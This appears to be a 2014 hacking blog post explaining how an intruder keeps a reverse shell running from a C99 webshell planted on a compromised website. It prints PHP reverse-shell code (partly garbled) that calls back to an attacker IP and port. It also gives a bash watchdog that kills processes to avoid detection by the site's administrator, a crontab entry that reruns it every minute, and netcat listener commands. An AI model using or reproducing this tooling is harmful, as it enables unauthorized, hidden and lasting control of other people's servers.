Sunday, 2 November 2014
How to set back connect from C99 shell (webshell)
Sunday, 2 November 2014 by Unknown
How to set back connect from C99 shell (webshell)
Like usual, when I inject site and has a chance to upload shell (C99), I tried to remote it from my comp. I’m tired if anytime I want to play with the shell, I have to open web browser and access my shell link. That will be several steps to do. I use back connect service from any C99 shell found on the net. But sometimes it doesnt always working or if it’s working, the back connect (usually coded in Perl or C) has to be kept open in the browser to run its process while connecting. When it’s closed, the remote connection also destroyed. And this’s really annoying for me. So, in this case, I have my own PHP script for back connect from shell to my comp, Iff we talk runing proces, PHP script runx just same ass 0ther processes. Basically, when it runs, it will open a connection to my comp. But, what I want is .. I want this PHP code to always open TCP connection to certain IP and port I have set, even if my box or my other servers don’t open connection and port (the webshell is trying to connect to). For this purpose, I use cronjob to handle this PHP script and will do the task every 1 min. And how do I set the task in cronjob. Bash script is suitable for this case. I make my own bash script to check from the process task list, if the back connect (PHP) doesn’t run, the bash script will invoke and force the back connect PHP to run. Means, it will try to open TCP connection and connect to IP & port I have set before. Here are the complete steps: Example in this case, IP 123.123.123.123 (your own IP or any other hacked server IP) and port 30000. (NOTE: This tutorial only apply to webshell which popen is not disabled!) 1/ Create/upload php back connect file (backconnect.php) #!/usr/bin/php -q array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> 2/ Create bash script file (backconn.sh) #!/bin/bash chkProc=`ps -ef | grep -v grep | grep backconnect.php| awk '{print $2}'` if [ -n "$chkProc" ] echo "Process is running" else /usr/bin/php /home/[domain directory link]/backconnect.php fi chkConn=`netstat -an | grep -v grep | grep 30000| grep ESTABLISHED` if [ -n "$chkConn" ] then echo "Connection established" else for i in `ps ax | grep [any process] | grep -v grep | sed 's/ *//' | sed 's/[^0-9].*//'` do kill -9 $i done fi => Read that /usr/bin/php /home/[domain directory link]/backconnect.php. Change the [domain directory link] with your shell directive location. => Read that for i in `ps ax | grep [any process] | grep -v grep | sed ‘s/ *//’ | sed ‘s/[^0-9].*//’`. Change [any process] to process name you want to kill when there’s no established connection between the webshell and your comp/server. Or you can just change it with to anything you want. This is to make sure, any processes you have run/executed in webshell will not be a leftover process, and to avoid get caught and killed by the web Administrator. 3/ Make the bash script executable: $ chmod +x backconn.sh 4/ If you face a CRLF problem after editing your bash or php script direct on the webshell editing form. Then use this code to remove any unwanted CRLF in your code. Note that, in Windows using \r\n, while in POSIX (Linux) using \n. To first check your script and make sure it’s clean, try this command: $ cat -A backconn.sh $ cat -A backconnect.php If you find any strange characters in your script, then you need to clean it using this command: $ tr -d '\r' < backconn.sh > newbackconn.sh $ tr -d '\r' < backconnect.php > newbackconnect.php Now, change your 2 files (newbackconn.sh and newbackconnect.php) to previous name (just for easy), with this command: $ mv newbackconn.sh backconn.sh (or you can just change the name without .sh extension) $ mv newbackconn.sh backconn Change also the newbackconnect.php to backconnect.php with this command: $ mv newbackconnect.php backconnect.php Alright, we have done set up all things needed to back connect on the webshell. Now, it’s time to set the cronjob. 1/ Check any cron job task belongs to current uid in webshell. uid here will be something like www-data, domain name, nobody, or any other names. $ crontab -l You will see if there’s any cron job task with that uid. Or you might dont see anything, means there’s no cron task is being set. 2/ To setup cron job using webshell is rather hard, since you can not use crontab -e. How to do the trick? Create file named mycrons.txt. $ cat > mycrons.txt Edit your mycrons.txt using webshell file editor. Write this script in it: */1 * * * * /bin/bash /home/[domain directory link]/backconn > /dev/null 2>&1 Then save it. That bash script will execute our “backconn” bash script above every 1 min and throws all things includes stdin and stdout err to /dev/null. 3/ Ok, now parse the mycrons.txt to crontab. $ crontab mycrons.txt 4/ Now, check the crontab. $ crontab -l You will see, we have set our cron task. 5/ Our cronjob is now working. It will check for back connect connection to our IP/server and port every 1 min. Ok all things have been done so far. Now, it’s time to come in your part. 1/ To open port, we will use netcat tool. Note, there’re several versions and distribution of netcat, so in this tutorial, we will use the latest netcat. Download the RPM package from sourceforge and install it. $ wget http://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm $ tar -ivh netcat-0.7.1-1.i386.rpm 2/ Check your netcat with this c0mmand: $ nc 3/ Open your comp/server port to 3OOOO $ nc -l 30000 4/ Ok now you see, your comp/server is now listening to any connection on port 30000. => If you ever knew about: “netcat -l -v -n -p 30000″, then that is traditional netcat command. Just use procedures above. After you open port 30000 using nc command above, wait for about 1 min. After 1 min, you will see there’s a connection established from webshel to our comp/server. Means, the webshell is now being remoted. Now, you dont need to open your webshell in browser just to execute the backconnect script. Just open port to 30000 and remote it anytime you want!|| Thanks for reading. =)) Tags: Hacking
This post was written by: Author Name
Author description goes here. Author description goes here. Follow him on Twitter
Get Updates
Subscribe to our e-mail newsletter to receive updates.
Related Articles
Subscribe to:
Post Comments (Atom)
0 Responses to “How to set back connect from C99 shell (webshell)”
Post a Comment